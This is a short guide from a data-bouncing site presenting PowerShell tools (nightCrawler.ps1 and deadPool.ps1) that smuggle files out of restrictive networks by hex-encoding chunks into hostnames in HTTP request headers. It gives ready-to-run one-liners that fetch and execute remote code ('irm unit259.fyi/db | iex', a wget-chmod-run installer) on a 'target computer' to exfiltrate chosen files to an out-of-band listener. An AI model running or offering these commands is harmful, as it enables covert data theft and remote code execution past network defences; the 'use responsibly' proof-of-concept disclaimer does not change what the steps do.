Data Bouncing With Jakoby

  • @site.url: https://databouncing.io
  • path: /data-bouncing-with-jakoby/
  • excerpt: Data Bouncing - PowerShell Version via Jakoby (Unit-259) - this version uses Hex in the hostname and defaults to a public interactsh (so you dont need your own DNS listener)
  • published date:
  • reading time: 2 minutes
  • tag: Guides
  • authors: JC

Jakoby (https://t.co/5G3vwgbJZv) Engaged, and whipped up some DataBouncing Powershell capabilities that you can enjoy in minutes.

GitHub - Unit-259/DataBouncing
Contribute to Unit-259/DataBouncing development by creating an account on GitHub.
GitHubUnit-259

The project consists of two main scripts:

  • nightCrawler.ps1: Manages data exfiltration.
  • deadPool.ps1: Handles reassembly of the exfiltrated data.

nightCrawler.ps1

This script encodes a file into hexadecimal chunks and sends each chunk as part of a domain name in an HTTP request header. It's used for exfiltrating data from restrictive networks.

deadPool.ps1

Processes data received from nightCrawler.ps1, finding patterns in logs, assembling data chunks, and converting them back to their original form.

Usage

Prerequisites

  • A controlled DNS server.
  • For hobbyists, InteractSh is recommended.

Setting Up

  1. Listener Setup: Use InteractSh Web Client or the Build Script with Ubuntu 22.04.You can use this single one liner to download, install, and run InteractSh on your server:

wget "https://unit259.fyi/interactshbuild" && chmod +x interactshbuild && ./interactshbuild

Start the InteractSh Client on your listener machine:

  1. Target Machine Preparation: Prepare your data to be exfiltrated. Run this nightCrawler.ps1 script on the target computer.

Running the Scripts

  1. Data Exfiltration with nightCrawler.ps1:Running irm unit259.fyi/db | iex will quickly load it on their system.You have the option of using our GUI as well. The following one liner will open it on any pc for you instantly.irm unit259.fyi/dbgui | iex
    • provide url for OOB Lister
    • provide filepath of target exfil data
GUI TOO
  1. Data Reconstruction with deadpool.ps1:
    • run it

Notes

  • Remember to replace placeholders like 'your-regex', 'your-domain.oast.online', etc., with actual values relevant to your setup.
  • The scripts are part of a PoC and should be used responsibly.

Jakoby can be found in a handful of places, https://my.link.gallery/iamjakoby, be polite, love cats and I'm sure he'll share some of his time.

More on this topic

Surgeon Script

  • date published:
  • reading-time: 3 min read
  • authors:
Working with specific parameters within web requests to Databounce

Web Headers (HLD)

  • date published:
  • reading-time: 1 min read
  • authors:
Mermaid Diagram Journey of Databouncing with HTTP Web Headers via trusted web servers and ultimately handed over to the exfil DNS

Identifying Candidates

  • date published:
  • reading-time: 2 min read
  • authors:
Example One is a glimpse into what is needed to identify DataBouncing Candidates Recruiter - Send stuff Interactsh - Listen for stuff Target List - Stuff to be sent

Bouncing with Nick Dunn

  • date published:
  • reading-time: 2 min read
  • authors:
When we where conceptualizing data bouncing, Nick rolled his sleeves top and put together the first set of reliable python tools to get data out and rebuilt via databouncing, this is achieved over four scripts - https://github.com/N1ckDunn/DataBouncing/tree/main